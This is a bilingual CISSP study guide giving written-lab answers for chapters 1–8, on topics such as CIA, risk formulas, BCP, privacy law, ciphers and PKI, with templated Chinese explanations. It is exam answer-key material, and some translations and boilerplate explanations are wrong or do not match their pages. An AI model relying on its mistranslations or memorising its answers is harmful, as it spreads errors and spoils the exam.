第1章:通过原则与政策实现安全治理 1. CIA三元组是机密性、完整性和可用性的组合。 机密性是指用于确保数据、 信息或资源机密性的措施概念; 完整性是指保护数据可靠性和正确性的概念; 可用性是指授权主体能够及时且不间断地访问对象的概念。 术语 CIA Triad 用于指代安全解决方案的三个关键组成部分。 2. 会计的要求包括识别、认证、授权和审计。 这些组成部分中的每一个都 必须具有法律可支持性,才能真正对个人的行为追究责任。 3. 六个安全角色包括高级经理、安全专业人员、资产所有者、保管人、操作员/用户 和审计员。 4. 安全政策的四个组成部分是政策、标准、指南和程序。 政策是广泛的安全 声明; 标准是硬件和软件安全合规性的定义; 当没有合适的程序时,使用指 南; 程序是用于以安全方式执行工作任务的详细分步说明。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
学习单元 158 / PDF P1552

第 1552 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 2: Personnel Security and Risk Management Concepts 1. Possible answers include job descriptions, principle of least privilege, separation of duties, job responsibilities, job rotation/cross-training, performance reviews, background checks, job action warnings, awareness, training, job training, exit interviews/terminations, nondisclosure agreements, employment agreements, privacy declaration, and acceptable use policies. 2. The formulas and values for quantitative risk assessment are as follows: AV = $ EF = % loss SLE = AV * EF ARO = # / yr ALE = SLE * ARO or AV * EF * ARO Cost/benefit = (ALE1 – ALE2) – ACS 3.

The Delphi technique is an anonymous feedback-and-response process used to enable a group to reach an anonymous consensus. Its primary purpose is to elicit honest and uninfluenced responses from all participants. The participants are usually gathered into a single meeting room. For each request for feedback, each participant writes down their response on paper or through digital messaging services anonymously. The results are compiled and presented to the group for evaluation. The process is repeated until a consensus is reached.

The goal or purpose of the Delphi technique is to facilitate the evaluation of ideas, concepts, and solutions on their own merit without the discrimination that often occurs based on who the idea comes from. 4. Risk assessment often involves a hybrid approach using both quantitative and qualitative methods. A purely quantitative analysis is not possible; not all elements and aspects of the analysis can be quantified because some are qualitative, some are subjective, and some are intangible. Since a purely quantitative risk assessment is not possible, balancing the results of a quantitative analysis is essential. The method of combining quantitative and qualitative analyses into a final

中文直译 / 整理

第2章:人员安全与风险管理概念 1. 可能的答案包括职位描述、最小权限原则、职责分离、工作职责、工作轮 换/交叉培训、绩效评估、背景调查、工作行为警告、意识、培训、岗位培训、 离职面谈/终止、保密协议、雇佣协议、隐私声明和可接受使用政策。 2. 定量风险评估的公式和值如下:AV = $ EF = % loss SLE = AV * EF ARO = # / yr ALE = SLE * ARO or AV * EF * ARO Cost/benefit = (ALE1 – ALE2) – ACS 3. 德尔菲技术是一种匿名反馈与回应过程,用于使群体达成匿名共识。 其主 要目的是引导所有参与者提供真实且不受影响的回应。 参与者通常被集中到 一个会议室中。 对于每一次反馈请求,每位参与者都会在纸上或通过数字消 息服务匿名写下他们的回应。 结果被汇总并呈现给小组进行评估。 该过程重 复进行,直至达成共识。 德尔菲技术的目标或目的是促进对想法、概念和解 决方案的独立评估,避免因想法来源不同而产生的偏见。 4. 风险评估通常涉及一种结合定量和定性方法的混合方法。 无法进行纯粹的 定量分析;

并非所有分析要素和方面都能被量化,因为有些是定性的,有些 是主观的,有些是无形的。 由于无法进行纯粹的定量风险评估,因此平衡定 量分析的结果至关重要。 将定量和定性分析结合成最终

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

政策:政策是高层原则,说明必须遵守什么。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1552 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Policy 高层、强制、稳定;Procedure 具体步骤。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
政策 政策是高层原则,说明必须遵守什么。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 159 / PDF P1553

第 1553 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

assessment of organizational risk is known as hybrid assessment or hybrid analysis. 5. The common social engineering principles are authority, intimidation, consensus, scarcity, familiarity, trust, and urgency. 6. Possible answers include eliciting information, pretexting, prepending, phishing, spear phishing, business email compromise (BEC), whaling, smishing, vishing, spam, shoulder surfing, invoice scams, hoaxes, impersonation, masquerading, tailgating, piggybacking, baiting, dumpster diving, identity fraud, typosquatting, influence campaigns, hybrid warfare, and social media abuse.

中文直译 / 整理

组织风险评估被称为混合评估或混合分析。 5. 常见的社会工程学原则包括权威、恐吓、从众、稀缺性、熟悉度、信任和 紧迫性。 6. 可能的答案包括诱骗信息、 pretexting、前置、钓鱼、鱼叉式钓鱼、商 业邮件入侵(BEC)、鲸钓、短信钓鱼、语音钓鱼、垃圾邮件、肩窥、发 票诈骗、恶作剧、冒充、伪装、尾随、搭便车、诱饵、翻找垃圾、身份欺 诈、错拼域名、影响活动、混合战争和社会媒体滥用。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1553 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
身份 身份是主体在系统中的标识。
学习单元 160 / PDF P1554

第 1554 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 3: Business Continuity Planning 1. Many federal, state, and local laws or regulations require businesses to implement BCP provisions. Including legal representation on your BCP team helps ensure that you remain compliant with laws, regulations, and contractual obligations. 2. The informal “seat-of-the-pants” approach is an excuse used by individuals who do not want to invest time and money in the proper creation of a BCP. This can lead to a catastrophe when a firmly laid plan isn't in place to guide the response during a stressful emergency situation. 3. Quantitative risk assessment involves using numbers and formulas to make a decision.

Qualitative risk assessment includes expertise instead of numeric measures, such as emotions, investor/consumer confidence, and workforce stability. 4. The BCP training plan should include a plan overview briefing for all employees and specific training for individuals with direct or indirect involvement. In addition, backup personnel should be trained for each key BCP role. 5. The four steps of the BCP process are project scope and planning, business impact analysis, continuity planning, and plan approval and implementation.

中文直译 / 整理

第3章:业务连续性规划 1. 许多联邦、州和地方法律或法规要求企业实施业务连续性规划(BCP)条 款。 在BCP团队中包含法律代表有助于确保您遵守法律、法规和合同义务。 2. 非正式的“凭直觉”做法是那些不愿投入时间和金钱来正确制定BCP的 人所找的借口。 当没有周密的计划指导紧急情况下的应对时,这可能导致 灾难性后果。 3. 定量风险评估涉及使用数字和公式做出决策。 定性风险评估则依赖专业知识, 例如情绪、投资者/消费者信心和员工队伍稳定性。 4. BCP培训计划应包括面向所有员工的计划概要简报,以及针对直接或间 接参与人员的专项培训。 此外,还应对每个关键BCP角色的后备人员进行 培训。 5. BCP 过程的四个步骤是项目范围与规划、业务影响分析、连续性规划, 以及计划审批与实施。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1554 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 161 / PDF P1555

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Chapter 4: Laws, Regulations, and Compliance 1. The two key mechanisms used to facilitate information transfers are standard contractual clauses (SCCs) and binding corporate rules (BCRs). In the past, organizations could rely on the EU/US Privacy Shield safe harbor agreement, but this agreement was deemed invalid by the Court of Justice of the European Union (CJEU). 2. Some common questions that organizations should ask about outsourced service providers are as follows: What types of sensitive information are stored, processed, or transmitted by the vendor? What controls are in place to protect the organization's information?

How is your organization's information segregated from that of other clients? If encryption is relied on as a security control, what encryption algorithms and key lengths are used? How is key management handled? What types of security audits does the vendor perform, and what access does the client have to those audits? Does the vendor rely on any other third parties to store, process, or transmit data? How do the provisions of the contract related to security extend to those third parties? Where will data storage, processing, and transmission take place? If outside the home country of the client and/or vendor, what implications does that have?

What is the vendor's incident response process and when will clients be notified of a potential security breach? What provisions are in place to ensure the ongoing integrity and availability of client data? 3. Some common steps that employers can take to notify employees of monitoring include clauses in employment contracts that state the employee should have no expectation of privacy while using corporate equipment, similar written statements in corporate acceptable use and privacy policies, logon banners warning that all communications are

中文直译 / 整理

第四章:法律、法规与合规 1. 用于促进信息传输的两个关键机制是标准合同条款(SCCs)和具有约束 力的公司规则(BCRs)。 过去,组织可以依赖欧盟/美国隐私盾安全港协议, 但该协议已被欧洲联盟法院(CJEU)裁定无效。 2. 组织在评估外包服务提供商时应询问的一些常见问题如下: 供应商存储、处理或 传输的敏感信息类型有哪些? 有哪些控制措施用于保护组织的信息? 贵组织的信息如何与其它客户的的信息隔离? 如果依赖加密作为安全控制措施,使用了哪些加密算法和密钥长 度? 密钥管理如何处理? 供应商执行哪些类型的安全审计? 客户对这些审计拥有何种访问权限? 供应商是否依赖其他第三方来存储、处理或传输数据? 合同中与安 全相关的条款如何延伸至这些第三方? 数据存储、处理和传输将在何处进行? 如果在客户和/或供应商所在 国之外,会带来哪些影响? 供应商的事件响应流程是什么? 客户将在何时被告知潜在的安全漏洞? What p条款位于 place 以确保持续的完整性和 客户数据的可用性?

3. 雇主可以采取的一些常见措施来通知员工监控情况,包括在雇佣合同中 加入条款,说明员工在使用公司设备时不应期望享有隐私权,类似书面声 明出现在公司可接受使用政策和隐私政策中,登录横幅警告所有通信均

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 162 / PDF P1556

第 1556 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

subject to monitoring, and labels on computers and telephones warning of monitoring.

中文直译 / 整理

受监控,并在计算机和电话上标注监控警告。

小白解释

场景先行:你是公司的安全负责人,正在读第 1556 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1556 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 163 / PDF P1557

第 1557 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 5: Protecting Security of Assets 1. Sensitive data is any data that isn't public. It includes personally identifiable information (PII), protected health information (PHI), proprietary data, and any other data that an organization needs to protect. PII is any information that can be used to identify an individual. 2. End of life (EOL) identifies the date when a vendor plans to stop selling and producing a product. End of support (EOS) identifies the date when a vendor plans to stop supporting a product. Organizations should replace products before the EOS date. 3. Organizations use pseudonymization when they want to create a dataset that they can transfer to others.

The new dataset doesn't hold any privacy-related data. However, the organization still holds the mapping of the pseudonyms and the original data and can reverse the process. Organizations that process credit card data use tokenization. A third party holds the mapping of the token and the credit card data, but the organization doesn't need to maintain the credit card data. Organizations use anonymization to remove all privacy data from a dataset. 4. Tailoring refers to modifying a list of controls to ensure they align with the mission of the organization. Tailoring includes scoping.

Scoping refers to reviewing a list of baseline security controls and selecting only those controls that apply to the IT systems you're trying to protect.

中文直译 / 整理

第五章:资产安全保护 1. 敏感数据是指任何非公开的数据。 它包括个人身份信息(PII)、受保护 的健康信息(PHI)、专有数据以及组织需要保护的任何其他数据。 PII 是 指可用于识别个人的任何信息。 2. 生命周期结束(EOL)指供应商计划停止销售和生产某产品的日期。 支持 终止(EOS)指供应商计划停止对某产品提供支持的日期。 组织应在 EOS 日 期前更换产品。 3. 当组织希望创建一个可转移给其他方的数据集时,会使用假名化。 新数据 集不包含任何与隐私相关的信息。 然而,组织仍保留假名与原始数据的映射 关系,并可逆转该过程。 处理信用卡数据的组织使用标记化技术。 第三方持 有标记与信用卡数据的映射关系,但组织无需维护信用卡数据。 组织使用匿 名化来从数据集中移除所有隐私数据。 4. 定制是指修改控制项列表,以确保其与组织的使命保持一致。 定制包括 范围界定。 范围界定是指审查基线安全控制项列表,并仅选择适用于您要 保护的IT系统的那些控制项。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1557 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 164 / PDF P1558

第 1558 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 6: Cryptography and Symmetric Key Algorithms 1. The major obstacle to the widespread adoption of one-time pad cryptosystems is the difficulty in creating and distributing the very lengthy keys on which the algorithm depends. 2.

The first step in encrypting the message, “I will pass the CISSP exam and become certified next month” using columnar transposition requires the assignment of numeric column values to the letters of the secret keyword SECURE: S E C U R E 5 2 1 6 4 3 Next, the letters of the message, “I will pass the CISSP exam and become certified next month” are written in order underneath the letters of the keyword: S E C U R E 5 2 1 6 4 3 I W I L L P A S S T H E C I S S P E X A M A N D B E C O M E C E R T I F I E D N E X T M O N T H Finally, the sender enciphers the message by reading down each column; the order in which the columns are read corresponds to the numbers assigned in the first step.

This produces the following ciphertext: I S S M C R D O W S I A E E E M P E E D E F X H L H P N M I E T I A C X B C I T L T S A O T N N 3. This message is decrypted by using the following function: P = (C - 3) mod 26 C: F R Q J U D W X O D W L R Q V B R X J R W L W P: C O N G R A T U L A T I O N S Y O U G O T I T The hidden message is “CongratulationsYouGotIt.” Congratulations, you got it!

中文直译 / 整理

第六章:密码学与对称密钥算法 1. 一次性密码本加密系统广泛采用的主要障碍在于,难以创建和分发 算法所依赖的非常长的密钥。 2. 使用列置换法加密消息“我将通过CISSP考试并在下个月获得认证”时, 第一步是为密钥单词SECURE的每个字母分配数值列序号: S E C U R E 5 2 1 6 4 3 接下来,将消息“我将通过CISSP考试并在下个月获得认证”的字母按顺 序写在密钥字母的下方: S E C U R E 5 2 1 6 4 3 I W I L L P A S S T H E C I S S P E X A M A N D B E C O M E C E R T I F I E D N E X T M O N T H 最后,发送方通过逐列向下读取来加密消息; 读取列的顺序与第一步 中分配的数字相对应。

这将生成以下密文: I S S M C R D O W S I A E E E M P E E D E F X H L H P N M I E T I A C X B C I T L T S A O T N N 3. 此消息通过以下函数解密: P = (C ‑ 3) mod 26 C: F R Q J U D W X O D W L R Q V B R X J R W L W P: C O N G R A T U L A T I O N S Y O U G O T I T 隐藏的消息是“CongratulationsYouGotIt。 ”恭喜你,你成功了!

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1558 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 165 / PDF P1559

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Chapter 7: PKI and Cryptographic Applications 1. Bob should encrypt the message using Alice's public key and then transmit the encrypted message to Alice. 2. Alice should decrypt the message using her private key. 3. Bob should generate a message digest from the plaintext message using a hash function. He should then encrypt the message digest using his own private key to create the digital signature. Finally, he should append the digital signature to the message and transmit it to Alice. 4. Alice should decrypt the digital signature in Bob's message using Bob's public key.

She should then create a message digest from the plaintext message using the same hashing algorithm Bob used to create the digital signature. Finally, she should compare the two message digests. If they are identical, Alice has assurance of message integrity. Alice should then make sure Bob's certificate is valid and issued from a trusted CA.

中文直译 / 整理

第七章:PKI 与加密应用 1. Bob 应使用 Alice 的公钥加密消息,然后将加密后的消息发送给 Alice。 2. Alice 应使用她的私钥解密消息。 3. Bob 应使用哈希函数从明文消息生成消息摘要,然后使用自己的私钥加密 该消息摘要以创建数字签名,最后将数字签名附加到消息中并发送给 Alice。 4. Alice 应使用 Bob 的公钥解密 Bob 消息中的数字签名,然后使用与 Bob 创建数字签名时相同的哈希算法从明文消息生成消息摘要,最后比较两 个消息摘要。 如果两者相同,则 Alice 可确认消息的完整性。 Alice 还应确 保 Bob 的证书有效且由受信任的 CA 颁发。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 166 / PDF P1560

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 8: Principles of Security Models, Design, and Capabilities 1. Security models include state machine (establishes the concept of a perfectly secure system), information flow (controls movement of data), noninterference (actions of subjects at one level do not affect the system state or actions of subjects at other levels), take-grant (control passage of rights to subjects), access control matrix (provides a perspective on access of multiple subjects across multiple objects), Bell–LaPadula (protects confidentiality), Biba (protects integrity), Clark–Wilson (protects integrity), and Brewer and Nash (avoids conflicts of interest). 2.

The primary components of the trusted computing base (TCB) are the hardware and software elements used to enforce the security policy (these elements are called the TCB), the security perimeter distinguishing and separating TCB components from non-TCB components, and the reference monitor that serves as an access control device across the security perimeter. 3. The two primary rules of Bell–LaPadula are the simple rule of no read-up and the star rule of no write-down. The two rules of Biba are the simple rule of no read-down and the star rule of no write-up. 4. An open system is one with published APIs that allows third parties to develop products to interact with it.

